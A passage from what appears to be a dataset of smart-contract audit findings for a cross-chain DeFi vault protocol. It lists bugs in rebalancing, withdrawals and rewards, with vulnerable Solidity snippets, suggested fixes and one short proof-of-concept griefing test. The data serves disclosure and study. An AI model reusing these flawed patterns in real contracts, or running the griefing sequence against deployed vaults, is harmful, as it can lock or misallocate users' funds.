The protocol should prevent such mistakes.","```\\n function withdrawalRequest(\\n uint256 _amount\\n ) external nonReentrant onlyWhenVaultIsOn returns (uint256 value) {\\n UserInfo storage user = userInfo[msg.sender];\\n require(user.withdrawalRequestPeriod == 0, ""Already a request"");\\n\\n value = (_amount * exchangeRate) / (10 ** decimals());\\n\\n _burn(msg.sender, _amount);\\n\\n user.withdrawalAllowance = value;\\n user.withdrawalRequestPeriod = rebalancingPeriod;\\n totalWithdrawalRequests += value;\\n }\\n```\\n" +An inactive vault can disrupt rebalancing of active vaults,medium,"An inactive vault can send its total underlying amount to the `XChainController` and disrupt rebalancing of active vaults by increasing the `underlyingReceived` counter:\\nif `pushVaultAmounts` is called before `underlyingReceived` overflows, rebalancing of one of the active vault may get stuck since the vault won't receive XChain allocations;\\nif `pushVaultAmounts` after all active vaults and at least one inactive vault has reported their underlying amounts, rebalancing of all vaults will get stuck.\\nRebalancing of vaults starts when Game.pushAllocationsToController is called. The function sends the allocations made by gamers to the `XChainController`. `XChainController` receives them in the receiveAllocationsFromGame function. In the settleCurrentAllocation function, a vault is marked as inactive if it has no allocations and there are no new allocations for the vault. `receiveAllocationsFromGameInt` remembers the number of active vaults.\\nThe next step of the rebalancing process is reporting vault underlying token balances to the `XChainController` by calling MainVault.pushTotalUnderlyingToController. As you can see, the function can be called in an inactive vault (the only modifier of the function, `onlyWhenIdle`, doesn't check that `vaultOff` is false). 
`XChainController` receives underlying balances in the setTotalUnderlying function: notice that the function increases the number of balances it has received.\\nNext step is the XChainController.pushVaultAmounts function, which calculates how much tokens each vault should receive after gamers have changed their allocations. The function can be called only when all active vaults have reported their underlying balances:\\n```\\nmodifier onlyWhenUnderlyingsReceived(uint256 _vaultNumber) {\\n require(\\n vaultStage[_vaultNumber].underlyingReceived == vaultStage[_vaultNumber].activeVaults,\\n ""Not all underlyings received""\\n );\\n _;\\n}\\n```\\n\\nHowever, as we saw above, inactive vaults can also report their underlying balances and increase the `underlyingReceived` counter-if this is abused mistakenly or intentionally (e.g. by a malicious actor), vaults may end up in a corrupted state. Since all the functions involved in rebalancing are not restricted (including `pushTotalUnderlyingToController` and pushVaultAmounts), a malicious actor can intentionally disrupt accounting of vaults or block a rebalancing.","In the `MainVault.pushTotalUnderlyingToController` function, consider disallowing inactive vaults (vaults that have `vaultOff` set to true) report their underlying balances.","If an inactive vault reports its underlying balances instead of an active vault (i.e. `pushVaultAmounts` is called when `underlyingReceived` is equal activeVaults), the active vault will be excluded from rebalancing and it won't receive updated allocations in the current period. Since the rebalancing interval is 2 weeks, the vault will lose the increased yield that might've been generated thanks to new allocations.\\nIf an inactive vault reports its underlying balances in addition to all active vaults (i.e. 
`pushVaultAmounts` is called when `underlyingReceived` is greater than activeVaults), then `pushVaultAmounts` will always revert and rebalancing will get stuck.","```\\nmodifier onlyWhenUnderlyingsReceived(uint256 _vaultNumber) {\\n require(\\n vaultStage[_vaultNumber].underlyingReceived == vaultStage[_vaultNumber].activeVaults,\\n ""Not all underlyings received""\\n );\\n _;\\n}\\n```\\n" +"Rebalancing can be indefinitely blocked due to ever-increasing `totalWithdrawalRequests`, causing locking of funds in vaults",medium,"Rebalancing can get stuck indefinitely at the `pushVaultAmounts` step due to an error in the accounting of `totalWithdrawalRequests`. As a result, funds will be locked in vaults since requested withdrawals are only executed after a next successful rebalance.\\nFunds deposited to underlying protocols can only be withdrawn from vaults after a next successful rebalance:\\na depositor has to make a withdrawal request first, which is tracked in the current rebalance period;\\nrequested funds can be withdrawn in the next rebalance period.\\nThus, it's critical that rebalancing doesn't get stuck during one of its stages.\\nDuring rebalancing, vaults report their balances to `XChainController` via the pushTotalUnderlyingToController function: the functions sends the current unlocked (i.e. excluding reserved funds) underlying token balance of the vault and the total amount of withdrawn requests in the current period. 
The latter amount is stored in the `totalWithdrawalRequests` storage variable:\\nthe variable is increased when a new withdrawal request is made;\\nand it's set to 0 after the vault has been rebalanced-it's value is added to the reserved funds.\\nThe logic of `totalWithdrawalRequests` is that it tracks only the requested withdrawal amounts in the current period-this amount becomes reserved during rebalancing and is added to `reservedFunds` after the vault has been rebalanced.\\nWhen `XChainController` receives underlying balances and withdrawal requests from vaults, it tracks them internally. The amounts then used to calculate how much tokens a vault needs to send or receive after a rebalancing: the total withdrawal amount is subtracted from vault's underlying balance so that it's excluded from the amounts that will be sent to the protocols and so that it could then be added to the reserved funds of the vault.\\nHowever, `totalWithdrawalRequests` in `XChainController` is not reset between rebalancings: when a new rebalancing starts, `XChainController` receives allocations from the Game and calls `resetVaultUnderlying`, which resets the underlying balances receive from vaults in the previous rebalancing. `resetVaultUnderlying` doesn't set `totalWithdrawalRequests` to 0:\\n```\\nfunction resetVaultUnderlying(uint256 _vaultNumber) internal {\\n vaults[_vaultNumber].totalUnderlying = 0;\\n vaultStage[_vaultNumber].underlyingReceived = 0;\\n vaults[_vaultNumber].totalSupply = 0;\\n}\\n```\\n\\nThis cause the value of `totalWithdrawalRequests` to accumulate over time. 
At some point, the total historical amount of all withdrawal requests (which `totalWithdrawalRequests` actually tracks) will be greater than the underlying balance of a vault, and this line will revert due to an underflow in the subtraction:\\n```\\nuint256 totalUnderlying = getTotalUnderlyingVault(_vaultNumber) - totalWithdrawalRequests;\\n```\\n","In `XChainController.resetVaultUnderlying`, consider setting `vaults[_vaultNumber].totalWithdrawalRequests` to 0. `totalWithdrawalRequests`, like its `MainVault.totalWithdrawalRequests` counterpart, tracks withdrawal requests only in the current period and should be reset to 0 between rebalancings.","Due to accumulation of withdrawal request amounts in the `totalWithdrawalRequests` variable, `XChainController.pushVaultAmounts` can be blocked indefinitely after the value of `totalWithdrawalRequests` has grown bigger than the value of `totalUnderlying` of a vault. Since withdrawals from vaults are delayed and enabled in a next rebalancing period, depositors may not be able to withdraw their funds from vaults, due to a blocked rebalancing.\\nWhile `XChainController` implements a bunch of functions restricted to the guardian that allow the guardian to push a rebalancing through, neither of these functions resets the value of `totalWithdrawalRequests`. 
If `totalWithdrawalRequests` becomes bigger than `totalUnderlying`, the guardian won't be able to fix the state of `XChainController` and push the rebalancing through.",```\\nfunction resetVaultUnderlying(uint256 _vaultNumber) internal {\\n vaults[_vaultNumber].totalUnderlying = 0;\\n vaultStage[_vaultNumber].underlyingReceived = 0;\\n vaults[_vaultNumber].totalSupply = 0;\\n}\\n```\\n +`XChainController::sendFundsToVault` can be griefed and leave `XChainController` in a bad state,medium,"A user can grief the send funds to vault state transition during by calling `sendFundsToVault` multiple times with the same vault.\\nDuring rebalancing, some vaults might need funds sent to them. They will be in state `WaitingForFunds`. To transition from here any user can trigger `XChainController` to send them funds by calling `sendFundsToVault`.\\nThis is trigger per chain and will transfer funds from `XChainController` to the respective vaults on each chain.\\nAt the end, when the vaults on each chain are processed and either have gotten funds sent to them or didn't need to `sendFundsToVaults` will trigger the state for this `vaultNumber` to be reset.\\nHowever, when transferring funds, there's never any check that this chain has not already been processed. 
So any user could simply call this function for a vault that either has no funds to transfer or where there's enough funds in `XChainController` and trigger the state reset for the vault.\\nPoC in `xChaincontroller.test.ts`, run after 4.5) Trigger vaults to transfer funds to xChainController:\\n```\\n it('5) Grief xChainController send funds to vaults', async function () {\\n await xChainController.sendFundsToVault(vaultNumber, slippage, 10000, 0, { value: 0, });\\n await xChainController.sendFundsToVault(vaultNumber, slippage, 10000, 0, { value: 0, });\\n await xChainController.sendFundsToVault(vaultNumber, slippage, 10000, 0, { value: 0, });\\n await xChainController.sendFundsToVault(vaultNumber, slippage, 10000, 0, { value: 0, });\\n\\n expect(await xChainController.getFundsReceivedState(vaultNumber)).to.be.equal(0);\\n\\n expect(await vault3.state()).to.be.equal(3);\\n\\n // can't trigger state change anymore\\n await expect(xChainController.sendFundsToVault(vaultNumber, slippage, 1000, relayerFee, {value: parseEther('0.1'),})).to.be.revertedWith('Not all funds received');\\n });\\n```\\n","Issue `XChainController::sendFundsToVault` can be griefed and leave `XChainController` in a bad state\\nI recommend the protocol either keeps track of which vaults have been sent funds in `XChainController`.\\nor changes so a vault can only receive funds when waiting for them:\\n```\\ndiff // Remove the line below\\n// Remove the line below\\ngit a/derby// Remove the line below\\nyield// Remove the line below\\noptimiser/contracts/MainVault.sol b/derby// Remove the line below\\nyield// Remove the line below\\noptimiser/contracts/MainVault.sol\\nindex 8739e24..d475ee6 100644\\n// Remove the line below\\n// Remove the line below\\n// Remove the line below\\n a/derby// Remove the line below\\nyield// Remove the line below\\noptimiser/contracts/MainVault.sol\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/derby// Remove the line below\\nyield// 
Remove the line below\\noptimiser/contracts/MainVault.sol\\n@@ // Remove the line below\\n328,7 // Add the line below\\n328,7 @@ contract MainVault is Vault, VaultToken {\\n /// @notice Step 5 end; Push funds from xChainController to vaults\\n /// @notice Receiving feedback from xController when funds are received, so the vault can rebalance\\n function receiveFunds() external onlyXProvider {\\n// Remove the line below\\n if (state != State.WaitingForFunds) return;\\n// Add the line below\\n require(state == State.WaitingForFunds,stateError);\\n settleReservedFunds();\\n }\\n \\n```\\n",XChainController ends up out of sync with the vault(s) that were supposed to receive funds.\\n`guardian` can resolve this by resetting the states using admin functions but these functions can still be frontrun by a malicious user.\\nUntil this is resolved the rebalancing of the impacted vaults cannot continue.,"```\\n it('5) Grief xChainController send funds to vaults', async function () {\\n await xChainController.sendFundsToVault(vaultNumber, slippage, 10000, 0, { value: 0, });\\n await xChainController.sendFundsToVault(vaultNumber, slippage, 10000, 0, { value: 0, });\\n await xChainController.sendFundsToVault(vaultNumber, slippage, 10000, 0, { value: 0, });\\n await xChainController.sendFundsToVault(vaultNumber, slippage, 10000, 0, { value: 0, });\\n\\n expect(await xChainController.getFundsReceivedState(vaultNumber)).to.be.equal(0);\\n\\n expect(await vault3.state()).to.be.equal(3);\\n\\n // can't trigger state change anymore\\n await expect(xChainController.sendFundsToVault(vaultNumber, slippage, 1000, relayerFee, {value: parseEther('0.1'),})).to.be.revertedWith('Not all funds received');\\n });\\n```\\n" +Vault could `rebalance()` before funds arrive from xChainController,medium,"Invoke sendFundsToVault() to Push funds from xChainController to vaults. 
which calls xTransferToVaults()\\nFor the cross-chain rebalancing `xTransferToVaults()` will execute this logic\\n```\\n // rest of code\\n pushFeedbackToVault(_chainId, _vault, _relayerFee);\\n xTransfer(_asset, _amount, _vault, _chainId, _slippage, _relayerFee);\\n // rest of code\\n```\\n\\n`pushFeedbackToVault()` Is to invoke receiveFunds() `pushFeedbackToVault()` always travels through the slow path\\n`xTransfer()` to transfer funds from one chain to another If fast liquidity is not available, the `xTransfer()` will go through the slow path.\\nThe vulnerability is if the `xcall()` of `pushFeedbackToVault()` is executed successfully before `xTransfer()` transfers the funds to the vault, anyone can invoke rebalance() this will lead to rebalancing Vaults with Imperfect funds (this could be true only if funds that are expected to be received from XChainController are greater than `reservedFunds` and `liquidityPerc` together )\\nThe above scenario could be done in two possible cases 1- `xTransfer()` will go through the slow path but because High Slippage the cross-chain message will wait until slippage conditions improve (relayers will continuously re-attempt the transfer execution).\\n2- Connext Team says\\n```\\nAll messages are added to a Merkle root which is sent across chains every 30 mins\\nAnd then those messages are executed by off-chain actors called routers\\n\\nso it is indeed possible that messages are received out of order (and potentially with increased latency in between due to batch times) \\nFor ""fast path"" (unauthenticated) messages, latency is not a concern, but ordering may still be (this is an artifact of the chain itself too btw)\\none thing you can do is add a nonce to your messages so that you can yourself order them at destination\\n```\\n\\nso `pushFeedbackToVault()` and `xTransfer()` could be added to a different Merkle root and this will lead to executing `receiveFunds()` before funds arrive.",Check if the funds have arrived or not,"The vault 
could `rebalance()` before funds arrive from xChainController, this will reduce rewards","```\\n // rest of code\\n pushFeedbackToVault(_chainId, _vault, _relayerFee);\\n xTransfer(_asset, _amount, _vault, _chainId, _slippage, _relayerFee);\\n // rest of code\\n```\\n"
+Wrong calculation of `balanceBefore` and `balanceAfter` in deposit method,medium,"Deposit method calculates net amount transferred from user. It uses `reservedFunds` also in consideration when calculating `balanceBefore` and `balanceAfter` but it is not actually required.\\n```\\n uint256 balanceBefore = getVaultBalance() - reservedFunds;\\n vaultCurrency.safeTransferFrom(msg.sender, address(this), _amount);\\n uint256 balanceAfter = getVaultBalance() - reservedFunds;\\n uint256 amount = balanceAfter - balanceBefore;\\n```\\n\\nDeposit may fail when `reservedFunds` is greater than `getVaultBalance()`","Use below code. This is the correct way of finding the net amount transferred by the depositor\\n```\\n uint256 balanceBefore = getVaultBalance();\\n vaultCurrency.safeTransferFrom(msg.sender, address(this), _amount);\\n uint256 balanceAfter = getVaultBalance();\\n uint256 amount = balanceAfter - balanceBefore;\\n```\\n",Deposit may fail when `reservedFunds` is greater than `getVaultBalance()`,"```\\n uint256 balanceBefore = getVaultBalance() - reservedFunds;\\n vaultCurrency.safeTransferFrom(msg.sender, address(this), _amount);\\n uint256 balanceAfter = getVaultBalance() - reservedFunds;\\n uint256 amount = balanceAfter - balanceBefore;\\n```\\n" +Malicious users could set allocations to a blacklist Protocol and break the rebalancing logic,medium,"`game.sol` pushes `deltaAllocations` to vaults by pushAllocationsToVaults() and it deletes all the value of the `deltas`\\n```\\nvaults[_vaultNumber].deltaAllocationProtocol[_chainId][i] = 0;\\n```\\n\\nMalicious users could set allocations to a blacklist Protocol. 
If only one of the `Baskets` has a non-zero value to a Protocol on blacklist receiveProtocolAllocations() will revert `receiveProtocolAllocations().receiveProtocolAllocationsInt().setDeltaAllocationsInt()`\\n```\\n function setDeltaAllocationsInt(uint256 _protocolNum, int256 _allocation) internal {\\n require(!controller.getProtocolBlacklist(vaultNumber, _protocolNum), ""Protocol on blacklist"");\\n deltaAllocations[_protocolNum] += _allocation;\\n deltaAllocatedTokens += _allocation;\\n }\\n```\\n\\nand You won't be able to execute rebalance()",You should check if the Protocol on the blacklist when Game players `rebalanceBasket()`,The guardian isn't able to restart the protocol manually. `game.sol` loses the value of the `deltas`. The whole system is down.,```\\nvaults[_vaultNumber].deltaAllocationProtocol[_chainId][i] = 0;\\n```\\n +Asking for `balanceOf()` in the wrong address,medium,"on sendFundsToVault() this logic\\n```\\naddress underlying = getUnderlyingAddress(_vaultNumber, _chain);\\nuint256 balance = IERC20(underlying).balanceOf(address(this));\\n```\\n\\nin case `_chainId` is Optimism the `underlying` address is for Optimism (L2) but `XChainController` is on Mainnet you can't invoke `balanceOf()` like this!!!","Issue Asking for `balanceOf()` in the wrong address\\n`getUnderlyingAddress(_vaultNumber, _chain);` should just be `getUnderlyingAddress(_vaultNumber);` so the `underlying` here\\n```\\nuint256 balance = IERC20(underlying).balanceOf(address(this));\\n```\\n\\nwill be always on the Mainnet",Asking for `balanceOf()` in the wrong address The protocol will be not able to rebalance the vault,"```\\naddress underlying = getUnderlyingAddress(_vaultNumber, _chain);\\nuint256 balance = IERC20(underlying).balanceOf(address(this));\\n```\\n" +`getDecimals()` always call the MainNet,medium,`XChainController.pushVaultAmounts()` is to push `exchangeRate` to the vaults. 
`XChainController.getVaultAddress()` returns the vault address of `vaultNumber` with the given `chainID`\\n`pushVaultAmounts()` invoke `xProvider.getDecimals()` internally to calculate `newExchangeRate`\\nThe xProvider.getDecimals() is always call the `address(vault)` from the MainNet. but `address(vault)` could be in any chain `XChainController.pushVaultAmounts()` could keep reverting with all the `chainID` (only the MainNet will be correct ) or it will return the wrong `decimals` values. (if the `address(vault)` is for other chain/L but it exist in the MainNet with a decimals())\\nthis will lead to a wrong `newExchangeRate`\\n```\\nuint256 newExchangeRate = (totalUnderlying * (10 ** decimals)) / totalSupply;\\n```\\n,You should invoke `getVaultAddress()` with `_chain` of the Mainnet. because all vaults have the same getDecimals (not all vaultNamber),`pushVaultAmounts()` will keep reverting and this will break all rebalancing logic,```\\nuint256 newExchangeRate = (totalUnderlying * (10 ** decimals)) / totalSupply;\\n```\\n +"User should not receive rewards for the rebalance period, when protocol was blacklisted, because of unpredicted behaviour of protocol price",medium,"User should not receive rewards for the rebalance period, when protocol was blacklisted, because of unpredicted behaviour of protocol price.\\nWhen user allocates derby tokens to some underlying protocol, he receive rewards according to the exchange price of that protocols token. This reward can be positive or negative. 
Rewards of protocol are set to `Game` contract inside `settleRewards` function and they are accumulated for user, once he calls `rebalanceBasket`.\\n```\\n function storePriceAndRewards(uint256 _totalUnderlying, uint256 _protocolId) internal {\\n uint256 currentPrice = price(_protocolId);\\n if (lastPrices[_protocolId] == 0) {\\n lastPrices[_protocolId] = currentPrice;\\n return;\\n }\\n\\n\\n int256 priceDiff = int256(currentPrice - lastPrices[_protocolId]);\\n int256 nominator = (int256(_totalUnderlying * performanceFee) * priceDiff);\\n int256 totalAllocatedTokensRounded = totalAllocatedTokens / 1E18;\\n int256 denominator = totalAllocatedTokensRounded * int256(lastPrices[_protocolId]) * 100; // * 100 cause perfFee is in percentages\\n\\n\\n if (totalAllocatedTokensRounded == 0) {\\n rewardPerLockedToken[rebalancingPeriod][_protocolId] = 0;\\n } else {\\n rewardPerLockedToken[rebalancingPeriod][_protocolId] = nominator / denominator;\\n }\\n\\n\\n lastPrices[_protocolId] = currentPrice;\\n }\\n```\\n\\nEvery time, previous price of protocol is compared with current price.\\nIn case if some protocol is hacked, there is `Vault.blacklistProtocol` function, that should withdraw reserves from protocol and mark it as blacklisted. The problem is that because of the hack it's not possible to determine what will happen with exhange rate of protocol. It can be 0, ot it can be very small or it can be high for any reasons. But protocol still accrues rewards per token for protocol, even that it is blacklisted. Because of that, user that allocated to that protocol can face with accruing very big negative or positive rewards. Both this cases are bad.\\nSo i believe that in case if protocol is blacklisted, it's better to set rewards as 0 for it.\\nExample. 1.User allocated 100 derby tokens for protocol A 2.Before `Vault.rebalance` call, protocol A was hacked which made it exchangeRate to be not real. 3.Derby team has blacklisted that protocol A. 
4.Vault.rebalance is called which used new(incorrect) exchangeRate of protocol A in order to calculate `rewardPerLockedToken` 5.When user calls rebalance basket next time, his rewards are accumulated with extremely high/low value.","Issue User should not receive rewards for the rebalance period, when protocol was blacklisted, because of unpredicted behaviour of protocol price\\nIn case if protocol is blacklisted, then set `rewardPerLockedToken` to 0 inside `storePriceAndRewards` function.",User's rewards calculation is unpredictable.,"```\\n function storePriceAndRewards(uint256 _totalUnderlying, uint256 _protocolId) internal {\\n uint256 currentPrice = price(_protocolId);\\n if (lastPrices[_protocolId] == 0) {\\n lastPrices[_protocolId] = currentPrice;\\n return;\\n }\\n\\n\\n int256 priceDiff = int256(currentPrice - lastPrices[_protocolId]);\\n int256 nominator = (int256(_totalUnderlying * performanceFee) * priceDiff);\\n int256 totalAllocatedTokensRounded = totalAllocatedTokens / 1E18;\\n int256 denominator = totalAllocatedTokensRounded * int256(lastPrices[_protocolId]) * 100; // * 100 cause perfFee is in percentages\\n\\n\\n if (totalAllocatedTokensRounded == 0) {\\n rewardPerLockedToken[rebalancingPeriod][_protocolId] = 0;\\n } else {\\n rewardPerLockedToken[rebalancingPeriod][_protocolId] = nominator / denominator;\\n }\\n\\n\\n lastPrices[_protocolId] = currentPrice;\\n }\\n```\\n" +The protocol could not handle multiple vaults correctly,medium,"The protocol needs to handle multiple vaults correctly. 
If there are three vaults (e.g.USDC, USDT, DAI) the protocol needs to rebalance them all without any problems\\nThe protocol needs to invoke pushAllocationsToController() every `rebalanceInterval` to push totalDeltaAllocations from Game to xChainController.\\n`pushAllocationsToController()` invoke `rebalanceNeeded()` to check if a rebalance is needed based on the set interval and it uses the state variable `lastTimeStamp` to do the calculations\\n```\\n function rebalanceNeeded() public view returns (bool) {\\n return (block.timestamp - lastTimeStamp) > rebalanceInterval || msg.sender == guardian;\\n }\\n```\\n\\nBut in the first invoking (for USDC vault) of `pushAllocationsToController()` it will update the state variable `lastTimeStamp` to the current `block.timestamp`\\n```\\nlastTimeStamp = block.timestamp;\\n```\\n\\nNow when you invoke (for DAI vault) `pushAllocationsToController()`. It will revert because of\\n```\\nrequire(rebalanceNeeded(), ""No rebalance needed"");\\n```\\n\\nSo if the protocol has two vaults or more (USDC, USDT, DAI) you can only do one rebalance every `rebalanceInterval`",Keep tracking the `lastTimeStamp` for every `_vaultNumber` by using an array,The protocol could not handle multiple vaults correctly\\nBoth Users and Game players will lose funds because the MainVault will not rebalance the protocols at the right time with the right values,```\\n function rebalanceNeeded() public view returns (bool) {\\n return (block.timestamp - lastTimeStamp) > rebalanceInterval || msg.sender == guardian;\\n }\\n```\\n +Vault.blacklistProtocol can revert in emergency,medium,"Vault.blacklistProtocol can revert in emergency, because it tries to withdraw underlying balance from protocol, which can revert for many reasons after it's hacked or paused.\\n```\\n function blacklistProtocol(uint256 _protocolNum) external onlyGuardian {\\n uint256 balanceProtocol = balanceUnderlying(_protocolNum);\\n currentAllocations[_protocolNum] = 0;\\n 
controller.setProtocolBlacklist(vaultNumber, _protocolNum);\\n savedTotalUnderlying -= balanceProtocol;\\n withdrawFromProtocol(_protocolNum, balanceProtocol);\\n }\\n```\\n\\nThe problem is that this function is trying to withdraw all balance from protocol. This can create problems as in case of hack, attacker can steal funds, pause protocol and any other things that can make `withdrawFromProtocol` function to revert. Because of that it will be not possible to add protocol to blacklist and as result system will stop working correctly.","Provide `needToWithdraw` param to the `blacklistProtocol` function. In case if it's safe to withdraw, then withdraw, otherwise, just set protocol as blacklisted. Also you can call function with `true` param again, once it's safe to withdraw. Example of hack situation flow: 1.underlying vault is hacked 2.you call setProtocolBlacklist(""vault"", false) which blacklists vault 3.in next tx you call setProtocolBlacklist(""vault"", true) and tries to withdraw",Hacked or paused protocol can't be set to blacklist.,"```\\n function blacklistProtocol(uint256 _protocolNum) external onlyGuardian {\\n uint256 balanceProtocol = balanceUnderlying(_protocolNum);\\n currentAllocations[_protocolNum] = 0;\\n controller.setProtocolBlacklist(vaultNumber, _protocolNum);\\n savedTotalUnderlying -= balanceProtocol;\\n withdrawFromProtocol(_protocolNum, balanceProtocol);\\n }\\n```\\n" +Game doesn't accrued rewards for previous rebalance period in case if rebalanceBasket is called in next period,medium,"Game doesn't accrued rewards for previous rebalance period in case if `rebalanceBasket` is called in next period. 
Because of that user do not receive rewards for the previous period and in case if he calls `rebalanceBasket` each rebalance period, he will receive rewards only for last one.\\n```\\n function addToTotalRewards(uint256 _basketId) internal onlyBasketOwner(_basketId) {\\n if (baskets[_basketId].nrOfAllocatedTokens == 0) return;\\n\\n\\n uint256 vaultNum = baskets[_basketId].vaultNumber;\\n uint256 currentRebalancingPeriod = vaults[vaultNum].rebalancingPeriod;\\n uint256 lastRebalancingPeriod = baskets[_basketId].lastRebalancingPeriod;\\n\\n\\n if (currentRebalancingPeriod <= lastRebalancingPeriod) return;\\n\\n\\n for (uint k = 0; k < chainIds.length; k++) {\\n uint32 chain = chainIds[k];\\n uint256 latestProtocol = latestProtocolId[chain];\\n for (uint i = 0; i < latestProtocol; i++) {\\n int256 allocation = basketAllocationInProtocol(_basketId, chain, i) / 1E18;\\n if (allocation == 0) continue;\\n\\n\\n int256 lastRebalanceReward = getRewardsPerLockedToken(\\n vaultNum,\\n chain,\\n lastRebalancingPeriod,\\n i\\n );\\n int256 currentReward = getRewardsPerLockedToken(\\n vaultNum,\\n chain,\\n currentRebalancingPeriod,\\n i\\n );\\n baskets[_basketId].totalUnRedeemedRewards +=\\n (currentReward - lastRebalanceReward) *\\n allocation;\\n }\\n }\\n }\\n```\\n\\nThis function allows user to accrue rewards only when currentRebalancingPeriod > `lastRebalancingPeriod`. When user allocates, he allocates for the next period. And `lastRebalancingPeriod` is changed after `addToTotalRewards` is called, so after rewards for previous period accrued. And when allocations are sent to the xController, then new rebalance period is started. So actually rewards accruing for period that user allocated for is started once `pushAllocationsToController` is called. 
And at this point currentRebalancingPeriod == `lastRebalancingPeriod` which means that if user will call rebalanceBasket for next period, the rewards will not be accrued for him, but `lastRebalancingPeriod` will be incremented. So actually he will not receive rewards for previous period.\\nExample. 1.currentRebalancingPeriod is 10. 2.user calls `rebalanceBasket` with new allocation and `lastRebalancingPeriod` is set to 11 for him. 3.pushAllocationsToController is called, so `currentRebalancingPeriod` becomes 11. 4.settleRewards is called, so rewards for the 11th cycle are accrued. 5.now user can call `rebalanceBasket` for the next 12th cycle. `addToTotalRewards` is called, but `currentRebalancingPeriod == `lastRebalancingPeriod` == 11`, so rewards were not accrued for 11th cycle. 6.new allocations are saved and `lastRebalancingPeriod` becomes 12. 7.the loop continues and every time when user allocates for next rewards his `lastRebalancingPeriod` is increased, but rewards are not added. 8.user will receive his rewards for previous cycle, only if he skips 1 rebalance period (he doesn't allocate on that period).\\nAs you can see this is a very serious bug. Because of that, a player that wants to adjust his allocation every rebalance period will lose all his rewards.","First of all, you need to allow calling `rebalanceBasket` only once per rebalance period, before the new rebalancing period starts and allocations are sent to xController. 
Then you need to change check inside `addToTotalRewards` to this `if (currentRebalancingPeriod < lastRebalancingPeriod) return;` in order to allow accruing for the same period.",Player loses all his rewards,"```\\n function addToTotalRewards(uint256 _basketId) internal onlyBasketOwner(_basketId) {\\n if (baskets[_basketId].nrOfAllocatedTokens == 0) return;\\n\\n\\n uint256 vaultNum = baskets[_basketId].vaultNumber;\\n uint256 currentRebalancingPeriod = vaults[vaultNum].rebalancingPeriod;\\n uint256 lastRebalancingPeriod = baskets[_basketId].lastRebalancingPeriod;\\n\\n\\n if (currentRebalancingPeriod <= lastRebalancingPeriod) return;\\n\\n\\n for (uint k = 0; k < chainIds.length; k++) {\\n uint32 chain = chainIds[k];\\n uint256 latestProtocol = latestProtocolId[chain];\\n for (uint i = 0; i < latestProtocol; i++) {\\n int256 allocation = basketAllocationInProtocol(_basketId, chain, i) / 1E18;\\n if (allocation == 0) continue;\\n\\n\\n int256 lastRebalanceReward = getRewardsPerLockedToken(\\n vaultNum,\\n chain,\\n lastRebalancingPeriod,\\n i\\n );\\n int256 currentReward = getRewardsPerLockedToken(\\n vaultNum,\\n chain,\\n currentRebalancingPeriod,\\n i\\n );\\n baskets[_basketId].totalUnRedeemedRewards +=\\n (currentReward - lastRebalanceReward) *\\n allocation;\\n }\\n }\\n }\\n```\\n" +MainVault.rebalanceXChain doesn't check that savedTotalUnderlying >= reservedFunds,medium,"MainVault.rebalanceXChain doesn't check that savedTotalUnderlying >= reservedAmount. Because of that, shortage can occur, if vault will lose some underlying during cross chain calls and reservedFunds will not be present in the vault.\\n`reservedFunds` is the amount that is reserved to be withdrawn by users. It's increased by `totalWithdrawalRequests` amount every cycle, when `setXChainAllocation` is called.\\n`setXChainAllocation` call is initiated by xController. This call provides vault with information about funds. 
In case if vault should send funds to the xController, then `SendingFundsXChain` state is set, also amount to send is stored.\\n```\\n function rebalanceXChain(uint256 _slippage, uint256 _relayerFee) external payable {\\n require(state == State.SendingFundsXChain, stateError);\\n\\n\\n if (amountToSendXChain > getVaultBalance()) pullFunds(amountToSendXChain);\\n if (amountToSendXChain > getVaultBalance()) amountToSendXChain = getVaultBalance();\\n\\n\\n vaultCurrency.safeIncreaseAllowance(xProvider, amountToSendXChain);\\n IXProvider(xProvider).xTransferToController{value: msg.value}(\\n vaultNumber,\\n amountToSendXChain,\\n address(vaultCurrency),\\n _slippage,\\n _relayerFee\\n );\\n\\n\\n emit RebalanceXChain(vaultNumber, amountToSendXChain, address(vaultCurrency));\\n\\n\\n amountToSendXChain = 0;\\n settleReservedFunds();\\n }\\n```\\n\\nAs you can see, function just pulls needed funds from providers if needed and sends them to xController. It doesn't check that after that amount that is held by vault is enough to cover `reservedFunds`. Because of that, the following situation can occur.\\n1.Suppose that vault has 1000 tokens as underlying amount. 2.reservedFunds is 200. 3.xController calculated that vault should send 800 tokens to xController (vault allocations is 0) and 200 should be still in the vault in order to cover `reservedFunds`. 4.when vault is going to send 800 tokens (between `setXChainAllocation` and `rebalanceXChain` call), then loss happens and totalUnderlying becomes 800, so currently vault has only 800 tokens in total. 
5.vault sends this 800 tokens to xController and has 0 to cover `reservedFunds`, but actually he should leave this 200 tokens in the vault in this case.\\n```\\n if (amountToSendXChain > getVaultBalance()) pullFunds(amountToSendXChain);\\n if (amountToSendXChain > getVaultBalance()) amountToSendXChain = getVaultBalance();\\n```\\n\\nI think that this is incorrect approach for withdrawing of funds as there is a risk that smth will happen with underlying amount in the providers, so it will be not enough to cover `reservedFunds` and calculations will be broken, users will not be able to withdraw. Same approach is done in `rebalance` function, which pulls `reservedFunds` after depositing to all providers. I guess that correct approach is not to touch `reservedFunds` amount. In case if you need to send amount to xController, then you need to withdraw it directly from provider. Of course if you have `getVaultBalance` that is bigger than `reservedFunds + amountToSendXChain`, then you can send them directly, without pulling.",You need to check that after you send funds to xController it's enough funds to cover `reservedFunds`.,Reserved funds protection can be broken,"```\\n function rebalanceXChain(uint256 _slippage, uint256 _relayerFee) external payable {\\n require(state == State.SendingFundsXChain, stateError);\\n\\n\\n if (amountToSendXChain > getVaultBalance()) pullFunds(amountToSendXChain);\\n if (amountToSendXChain > getVaultBalance()) amountToSendXChain = getVaultBalance();\\n\\n\\n vaultCurrency.safeIncreaseAllowance(xProvider, amountToSendXChain);\\n IXProvider(xProvider).xTransferToController{value: msg.value}(\\n vaultNumber,\\n amountToSendXChain,\\n address(vaultCurrency),\\n _slippage,\\n _relayerFee\\n );\\n\\n\\n emit RebalanceXChain(vaultNumber, amountToSendXChain, address(vaultCurrency));\\n\\n\\n amountToSendXChain = 0;\\n settleReservedFunds();\\n }\\n```\\n" +maxTrainingDeposit can be bypassed,medium,"It was observed that User can bypass the 
